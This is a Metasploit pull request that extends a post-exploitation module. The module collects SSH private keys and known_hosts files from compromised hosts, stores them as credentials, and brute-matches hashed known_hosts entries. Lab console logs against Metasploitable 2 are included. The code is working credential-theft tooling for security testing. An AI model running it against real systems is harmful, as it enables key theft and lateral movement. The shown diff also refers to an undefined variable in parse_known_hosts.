### PR TITLE
ssh_creds: PARSE_KNOWN_HOSTS & CRACK_KNOWN_HOSTS

### DIFF
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -106,7 +106,53 @@ class MetasploitModule < Msf::Post
         data = read_file(file_path)
         file = file.split(sep).last
 
-        loot_path = store_loot("ssh.#{file.tr('.', '_')}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
+        # Consistency with: ./modules/auxiliary/scanner/ssh/ssh_key_login.rb, ./modules/exploits/multi/persistence/ssh_key.rb & ./modules/post/multi/gather/ssh_creds.rb
+        ktype = file[/\Aid_(\w+)\z/, 1]
+        pub_ktype = file[/\Aid_(\w+)\.pub\z/, 1]
+        ltype = if ktype
+                  "ssh.privatekey.#{ktype}"
+                elsif pub_ktype
+                  "ssh.publickey.#{pub_ktype}"
+                else
+                  "ssh.#{user}.#{file.tr('.', '_')}"
+                end
+
+        lname = if ktype
+                  "#{user}_id_#{ktype}"
+                elsif pub_ktype
+                  "#{user}_id_#{pub_ktype}.pub"
+                else
+                  "#{user}_#{file}"
+                end
+
+        linfo = if ktype && data.to_s.include?('PRIVATE KEY')
+                  begin
+                    k = Net::SSH::KeyFactory.load_data_private_key(data, nil, false)
+                    k.fingerprint('SHA256')
+                  rescue StandardError
+                    "OpenSSH #{ktype.upcase} private key for #{user}"
+                  end
+                elsif ktype
+                  "OpenSSH #{ktype.upcase} private key for #{user}"
+                elsif pub_ktype
+                  begin
+                    k = Net::SSH::KeyFactory.load_data_public_key(data.strip)
+                    k.fingerprint('SHA256')
+                  rescue StandardError
+                    "OpenSSH #{pub_ktype.upcase} public key for #{user}"
+                  end
+                else
+                  "OpenSSH #{file} File"
+                end
+
+        loot_path = store_loot(
+          ltype,
+          'text/plain',
+          session,
+          (data.to_s.chomp + "\n"),
+          lname,
+          linfo
+        )
         print_good("Downloaded: #{file_path} -> #{loot_path}")
 
         if file == 'known_hosts'

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -69,17 +69,21 @@ class MetasploitModule < Msf::Post
         next
       end
 
-      if session.type == 'meterpreter'
-        sep = session.fs.file.separator
-        files = session.fs.dir.entries(path)
-      else
-        # Guess, but it's probably right
-        sep = '/'
-        files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
+      begin
+        if session.type == 'meterpreter'
+          sep = session.fs.file.separator
+          files = session.fs.dir.entries(path)
+        else
+          sep = '/'
+          files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
+        end
+      rescue StandardError => e
+        print_warning("Cannot access directory: #{path} - #{e.message}")
+        next
       end
-      path_array = path.split(sep)
-      path_array.pop
-      user = path_array.pop
+
+      user = File.basename(File.dirname(path))
+      vprint_status("User: #{user}")
       files.each do |file|
         next if ['.', '..'].include?(file)
 
@@ -90,11 +94,11 @@ class MetasploitModule < Msf::Post
           next
         end
 
-        data = read_file("#{path}#{sep}#{file}")
+        data = read_file(file_path)
         file = file.split(sep).last
 
-        loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
-        print_good("Downloaded: #{path}#{sep}#{file} -> #{loot_path}")
+        loot_path = store_loot("ssh.#{file.tr('.', '_')}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
+        print_good("Downloaded: #{file_path} -> #{loot_path}")
 
         # store only ssh private keys
         next if SSHKey.valid_ssh_public_key? data

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Post
     return unless data.to_s.include?('PRIVATE KEY')
 
     begin
-      Net::SSH::KeyFactory.load_data_private_key(data, nil, false)
+      key = Net::SSH::KeyFactory.load_data_private_key(data, nil, false)
 
       create_credential(
         origin_type: :session,
@@ -137,6 +137,16 @@ class MetasploitModule < Msf::Post
         port: 22,
         service_name: 'ssh',
         protocol: 'tcp'
+      )
+
+      report_note(
+        host: session.session_host,
+        port: 22,
+        proto: 'tcp',
+        sname: 'ssh',
+        type: 'ssh.privatekey',
+        data: { user: user, file: filename, fingerprint: key.fingerprint('SHA256') },
+        update: :unique_data
       )
 
       print_good("Stored SSH private key (#{filename}) for user: #{user}")

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -6,6 +6,8 @@
 require 'net/ssh'
 
 class MetasploitModule < Msf::Post
+  LOOPBACK_ADDRS = ['localhost', '127.0.0.1', '::1'].freeze
+
   include Msf::Post::File
   include Msf::Post::Unix
 
@@ -40,6 +42,12 @@ class MetasploitModule < Msf::Post
           'Reliability' => []
         }
       )
+    )
+
+    register_options(
+      [
+        OptBool.new('PARSE_KNOWN_HOSTS', [false, 'Parse plaintext known_hosts entries and store as workspace hosts', true])
+      ]
     )
   end
 
@@ -100,8 +108,11 @@ class MetasploitModule < Msf::Post
         loot_path = store_loot("ssh.#{file.tr('.', '_')}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
         print_good("Downloaded: #{file_path} -> #{loot_path}")
 
-        # store only ssh private keys
-        store_ssh_key(data, user, file)
+        if file == 'known_hosts'
+          parse_known_hosts(data) if datastore['PARSE_KNOWN_HOSTS']
+        else
+          store_ssh_key(data, user, file)
+        end
       end
     end
   end
@@ -132,5 +143,32 @@ class MetasploitModule < Msf::Post
     rescue StandardError => e
       print_warning("Could not parse SSH private key in #{filename}: #{e.message}")
     end
+  end
+
+  def parse_known_hosts(data)
+    hosts_found = 0
+
+    data.each_line do |line|
+      line.strip!
+      next if line.empty? || line.start_with?('#')
+      next if line.start_with?('|') # hashed entries (|1|...) cannot be reversed
+
+      hosts_field = line.split(' ').first
+      next unless hosts_field
+
+      hosts_field.split(',').each do |entry|
+        host = entry.gsub(/\A\[/, '').gsub(/\]:\d+\z/, '') # strip [host]:port brackets
+        next if host.empty?
+
+        hosts_found += 1
+
+        resolved = LOOPBACK_ADDRS.include?(host) ? session.session_host : host
+        vprint_good("Found host in known_hosts: #{host}#{" (#{resolved})" if resolved != host}")
+        report_host(host: resolved, info: 'Discovered via SSH known_hosts')
+      end
+    end
+
+    msg = "Parsed #{hosts_found} host #{'entry'.pluralize(hosts_found)} from known_hosts"
+    matched > 0 ? print_status(msg) : vprint_status(msg)
   end
 end

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -20,9 +20,12 @@ class MetasploitModule < Msf::Post
           downloaded. This module is largely based on firefox_creds.rb.
         },
         'License' => MSF_LICENSE,
-        'Author' => ['Jim Halfpenny'],
+        'Author' => [
+          'Jim Halfpenny',
+          'g0tmi1k' # @g0tmi1k - additional features
+        ],
         'Platform' => %w[bsd linux osx unix],
-        'SessionTypes' => ['meterpreter', 'shell' ],
+        'SessionTypes' => ['meterpreter', 'shell'],
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -62,7 +65,7 @@ class MetasploitModule < Msf::Post
       print_status("Looting #{path} directory")
 
       unless executable?(path)
-        print_warning("Cannot access directory: #{path} . Missing execute permission. Skipping.")
+        print_warning("Cannot access directory: #{path} - Missing execute permission")
         next
       end
 
@@ -83,7 +86,7 @@ class MetasploitModule < Msf::Post
         file_path = "#{path}#{sep}#{file}"
 
         unless readable?(file_path)
-          print_warning("Cannot read file: #{file_path} . Missing read permission. Skipping.")
+          print_warning("Cannot read file: #{file_path} - Missing read permission")
           next
         end
 
@@ -91,7 +94,7 @@ class MetasploitModule < Msf::Post
         file = file.split(sep).last
 
         loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
-        print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
+        print_good("Downloaded: #{path}#{sep}#{file} -> #{loot_path}")
 
         # store only ssh private keys
         next if SSHKey.valid_ssh_public_key? data

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -36,6 +36,9 @@ class MetasploitModule < Msf::Post
             ]
           }
         },
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1552_004_PRIVATE_KEYS]
+        ],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [],

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'sshkey'
+require 'net/ssh'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::File
@@ -101,26 +101,36 @@ class MetasploitModule < Msf::Post
         print_good("Downloaded: #{file_path} -> #{loot_path}")
 
         # store only ssh private keys
-        next if SSHKey.valid_ssh_public_key? data
-
-        begin
-          key = SSHKey.new(data, passphrase: '')
-
-          credential_data = {
-            origin_type: :session,
-            session_id: session_db_id,
-            post_reference_name: refname,
-            private_type: :ssh_key,
-            private_data: key.key_object.to_s,
-            username: user,
-            workspace_id: myworkspace_id
-          }
-
-          create_credential(credential_data)
-        rescue OpenSSL::OpenSSLError => e
-          print_error("Could not load SSH Key: #{e.message}")
-        end
+        store_ssh_key(data, user, file)
       end
+    end
+  end
+
+  def store_ssh_key(data, user, filename)
+    return unless data.to_s.include?('PRIVATE KEY')
+
+    begin
+      Net::SSH::KeyFactory.load_data_private_key(data, nil, false)
+
+      create_credential(
+        origin_type: :session,
+        session_id: session_db_id,
+        post_reference_name: refname,
+        private_type: :ssh_key,
+        private_data: data,
+        username: user,
+        workspace_id: myworkspace_id,
+        address: session.session_host,
+        port: 22,
+        service_name: 'ssh',
+        protocol: 'tcp'
+      )
+
+      print_good("Stored SSH private key (#{filename}) for user: #{user}")
+    rescue Net::SSH::KeyFactory::KeyManagerError
+      print_warning("SSH private key (#{filename}) is passphrase-protected - stored as loot but not parsed")
+    rescue StandardError => e
+      print_warning("Could not parse SSH private key in #{filename}: #{e.message}")
     end
   end
 end

--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -46,7 +46,8 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
-        OptBool.new('PARSE_KNOWN_HOSTS', [false, 'Parse plaintext known_hosts entries and store as workspace hosts', true])
+        OptBool.new('PARSE_KNOWN_HOSTS', [false, 'Parse plaintext known_hosts entries and store as workspace hosts', true]),
+        OptBool.new('CRACK_KNOWN_HOSTS', [false, 'Attempt to identify hashed known_hosts entries by checking against workspace hosts', true])
       ]
     )
   end
@@ -110,6 +111,7 @@ class MetasploitModule < Msf::Post
 
         if file == 'known_hosts'
           parse_known_hosts(data) if datastore['PARSE_KNOWN_HOSTS']
+          crack_hashed_known_hosts(data) if datastore['CRACK_KNOWN_HOSTS']
         else
           store_ssh_key(data, user, file)
         end
@@ -169,6 +171,37 @@ class MetasploitModule < Msf::Post
     end
 
     msg = "Parsed #{hosts_found} host #{'entry'.pluralize(hosts_found)} from known_hosts"
+    matched > 0 ? print_status(msg) : vprint_status(msg)
+  end
+
+  def crack_hashed_known_hosts(data)
+    return unless framework.db.active
+
+    candidates = framework.db.hosts(workspace: myworkspace).flat_map { |h| [h.address, h.name].compact }
+    candidates += LOOPBACK_ADDRS
+    candidates.uniq!
+
+    matched = 0
+    data.each_line do |line|
+      line.strip!
+      next unless line.start_with?('|1|')
+
+      _, _, salt_b64, hash_b64 = line.split(' ').first.split('|')
+      salt = Base64.decode64(salt_b64)
+
+      candidates.each do |host|
+        computed = Base64.strict_encode64(OpenSSL::HMAC.digest('SHA1', salt, host))
+        next unless computed == hash_b64
+
+        matched += 1
+
+        resolved = LOOPBACK_ADDRS.include?(host) ? session.session_host : host
+        vprint_good("Matched hashed known_hosts entry: #{host}#{" (#{resolved})" if resolved != host}")
+        report_host(host: resolved, info: 'Matched via hashed SSH known_hosts')
+      end
+    end
+
+    msg = "Matched #{matched} hashed #{'entry'.pluralize(matched)} against workspace hosts"
     matched > 0 ? print_status(msg) : vprint_status(msg)
   end
 end


### PR DESCRIPTION
This PR helps to improve by doing:

- Use SSH mixin
- Add PARSE_KNOWN_HOSTS & CRACK_KNOWN_HOSTS options, map out where target has been connecting too
- Tweak output
- Consistency with loot and other modules
- Update module metadata

Target is Metasploitable 2.

```
        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         1      0      0      0
After : *        default  1      1         1      1      5      1
```

_Note, this module uses the exploit/multi/ssh/sshexec module to get a session. However, its not using the PR I recently opened up improving it (Thats out of scope for this PR)._




## Before

- Private key loading could silently failed 
- Private key downloaded as loot but not stored as a credential
- known_hosts files downloaded but never analysed - left to user to-do manually
- Services: 0 
  - Thus vuln wasn't linked

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use post/multi/gather/ssh_creds;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:34217 -> 10.0.0.10:22) at 2026-05-27 07:22:38 +0100
[*] Session 1 created in the background.

Module options (post/multi/gather/ssh_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(multi/gather/ssh_creds) >
```

```console
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf post(multi/gather/ssh_creds) > run SESSION=1
[*] Finding .ssh directories
[*] Looting 3 .ssh directories
[*] Looting /home/msfadmin/.ssh directory
[+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527072328_default_10.0.0.10_ssh.authorized_k_062625.txt
[-] Could not load SSH Key: invalid curve name
[+] Downloaded /home/msfadmin/.ssh/id_rsa -> /home/kali/.msf4/loot/20260527072331_default_10.0.0.10_ssh.id_rsa_064617.txt
[+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /home/kali/.msf4/loot/20260527072334_default_10.0.0.10_ssh.id_rsa.pub_405138.txt
[*] Looting /home/user/.ssh directory
[!] Cannot access directory: /home/user/.ssh . Missing execute permission. Skipping.
[*] Looting /root/.ssh directory
[+] Downloaded /root/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527072338_default_10.0.0.10_ssh.authorized_k_041137.txt
[+] Downloaded /root/.ssh/known_hosts -> /home/kali/.msf4/loot/20260527072341_default_10.0.0.10_ssh.known_hosts_951312.txt
[*] Post module execution completed
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      1      5      0

msf post(multi/gather/ssh_creds) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf post(multi/gather/ssh_creds) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                     References
---------                ----       -------  --------  ----                     ----------
2026-05-27 06:22:38 UTC  10.0.0.10  None     {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf post(multi/gather/ssh_creds) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
593        10.0.0.10           msfadmin  57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a         SSH key

msf post(multi/gather/ssh_creds) > loot

Loot
====

host       service  type                 name                 content     info                          path
----       -------  ----                 ----                 -------     ----                          ----
10.0.0.10           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /home/kali/.msf4/loot/20260527072328_default_10.0.0.10_ssh.authorized_k_062625.txt
10.0.0.10           ssh.id_rsa           ssh_id_rsa           text/plain  OpenSSH id_rsa File           /home/kali/.msf4/loot/20260527072331_default_10.0.0.10_ssh.id_rsa_064617.txt
10.0.0.10           ssh.id_rsa.pub       ssh_id_rsa.pub       text/plain  OpenSSH id_rsa.pub File       /home/kali/.msf4/loot/20260527072334_default_10.0.0.10_ssh.id_rsa.pub_405138.txt
10.0.0.10           ssh.authorized_keys  ssh_authorized_keys  text/plain  OpenSSH authorized_keys File  /home/kali/.msf4/loot/20260527072338_default_10.0.0.10_ssh.authorized_k_041137.txt
10.0.0.10           ssh.known_hosts      ssh_known_hosts      text/plain  OpenSSH known_hosts File      /home/kali/.msf4/loot/20260527072341_default_10.0.0.10_ssh.known_hosts_951312.txt

msf post(multi/gather/ssh_creds) >
```



## After

- All testing was done on this branch, with SSH mixin (https://github.com/rapid7/metasploit-framework/pull/21479) and auth_brute_mixin applied (https://github.com/rapid7/metasploit-framework/pull/21396)
- Services recorded
- SHA265 fingerprint shown
- Automate reading in known_hosts, 
  - Also attempt to "crack" them (with whatever is in our database)  

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use post/multi/gather/ssh_creds;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:39183 -> 10.0.0.10:22) at 2026-05-27 07:44:12 +0100
[*] Session 1 created in the background.

Module options (post/multi/gather/ssh_creds):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CRACK_KNOWN_HOSTS  true             no        Attempt to identify hashed known_hosts entries by checking against workspace hosts
   PARSE_KNOWN_HOSTS  true             no        Parse plaintext known_hosts entries and store as workspace hosts
   SESSION                             yes       The session to run this module on


View the full module info with the info, or info -d command.

msf post(multi/gather/ssh_creds) >
```

```console
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf post(multi/gather/ssh_creds) > run SESSION=1
[*] Finding .ssh directories
[*] Looting 3 .ssh directories
[*] Looting /home/msfadmin/.ssh directory
[*] User: msfadmin
[+] Downloaded: /home/msfadmin/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527074444_default_10.0.0.10_ssh.msfadmin.aut_669207.txt
[+] Downloaded: /home/msfadmin/.ssh/id_rsa -> /home/kali/.msf4/loot/20260527074447_default_10.0.0.10_ssh.privatekey.r_686269.txt
[+] Stored SSH private key (id_rsa) for user: msfadmin
[+] Downloaded: /home/msfadmin/.ssh/id_rsa.pub -> /home/kali/.msf4/loot/20260527074450_default_10.0.0.10_ssh.publickey.rs_546440.txt
[*] Looting /home/user/.ssh directory
[!] Cannot access directory: /home/user/.ssh - Missing execute permission
[*] Looting /root/.ssh directory
[*] User: root
[+] Downloaded: /root/.ssh/authorized_keys -> /home/kali/.msf4/loot/20260527074454_default_10.0.0.10_ssh.root.authori_178272.txt
[+] Downloaded: /root/.ssh/known_hosts -> /home/kali/.msf4/loot/20260527074457_default_10.0.0.10_ssh.root.known_h_414686.txt
[*] Parsed 0 host entries from known_hosts
[+] Matched hashed known_hosts entry: localhost (10.0.0.10)
[*] Matched 1 hashed entry against workspace hosts
[*] Post module execution completed
msf post(multi/gather/ssh_creds) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      1      5      1

msf post(multi/gather/ssh_creds) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info                                comments
-------    ---  ----  -------  ---------  -----  -------  ----                                --------
10.0.0.10             Unknown                    device   Matched via hashed SSH known_hosts

msf post(multi/gather/ssh_creds) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf post(multi/gather/ssh_creds) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                     References
---------                ----       -------       --------  ----                     ----------
2026-05-27 06:44:12 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf post(multi/gather/ssh_creds) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
595        10.0.0.10           msfadmin  57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a         SSH key

msf post(multi/gather/ssh_creds) > loot

Loot
====

host       service  type                          name                      content     info                                                path
----       -------  ----                          ----                      -------     ----                                                ----
10.0.0.10           ssh.msfadmin.authorized_keys  msfadmin_authorized_keys  text/plain  OpenSSH authorized_keys File                        /home/kali/.msf4/loot/20260527074444_default_10.0.0.10_ssh.msfadmin.aut_669207.txt
10.0.0.10           ssh.privatekey.rsa            msfadmin_id_rsa           text/plain  SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U  /home/kali/.msf4/loot/20260527074447_default_10.0.0.10_ssh.privatekey.r_686269.txt
10.0.0.10           ssh.publickey.rsa             msfadmin_id_rsa.pub       text/plain  SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U  /home/kali/.msf4/loot/20260527074450_default_10.0.0.10_ssh.publickey.rs_546440.txt
10.0.0.10           ssh.root.authorized_keys      root_authorized_keys      text/plain  OpenSSH authorized_keys File                        /home/kali/.msf4/loot/20260527074454_default_10.0.0.10_ssh.root.authori_178272.txt
10.0.0.10           ssh.root.known_hosts          root_known_hosts          text/plain  OpenSSH known_hosts File                            /home/kali/.msf4/loot/20260527074457_default_10.0.0.10_ssh.root.known_h_414686.txt

msf post(multi/gather/ssh_creds) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type            Data
 ----                     ----       -------  ----  --------  ----            ----
 2026-05-27 06:44:47 UTC  10.0.0.10  ssh      22    tcp       ssh.privatekey  {:user=>"msfadmin", :file=>"id_rsa", :fingerprint=>"SHA256:f2VC/Mf1KPOyVzqeE6QpplojiGKjOzu8At+KIDT8T0U"}

msf post(multi/gather/ssh_creds) >
```